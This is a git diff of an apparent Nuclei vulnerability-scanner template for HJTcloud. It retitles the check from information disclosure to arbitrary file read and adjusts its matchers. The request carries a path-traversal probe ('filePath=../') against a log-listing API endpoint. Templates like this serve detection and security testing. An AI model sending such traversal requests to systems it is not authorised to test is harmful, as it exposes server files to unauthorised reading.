--- a/vulnerabilities/other/hjtcloud-rest-arbitrary-file-read.yaml
+++ b/vulnerabilities/other/hjtcloud-rest-arbitrary-file-read.yaml
@@ -1,24 +1,27 @@
-id: hjtcloud-information-disclosure
+id: hjtcloud-arbitrary-file-read
 
 info:
-  name: HJTcloud Information Disclosure
+  name: HJTcloud Arbitrary file read
   author: pikpikcu
   severity: low
   reference: https://mp.weixin.qq.com/s/w2pkj5ADN7b5uxe-wmfGbw
-  tags: hjtcloud,exposure,config
+  tags: hjtcloud,lfi
   
 
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}//him/api/rest/V1.0/system/log/list?filePath=../"
+      - "{{BaseURL}}/him/api/rest/V1.0/system/log/list?filePath=../"
 
     matchers-condition: and
     matchers:
 
       - type: word
         words:
-          - "/var/logs/../logs/"
+          - "name"
+          - "length"
+          - "filePath"
+        condition: and
 
       - type: status
         status:
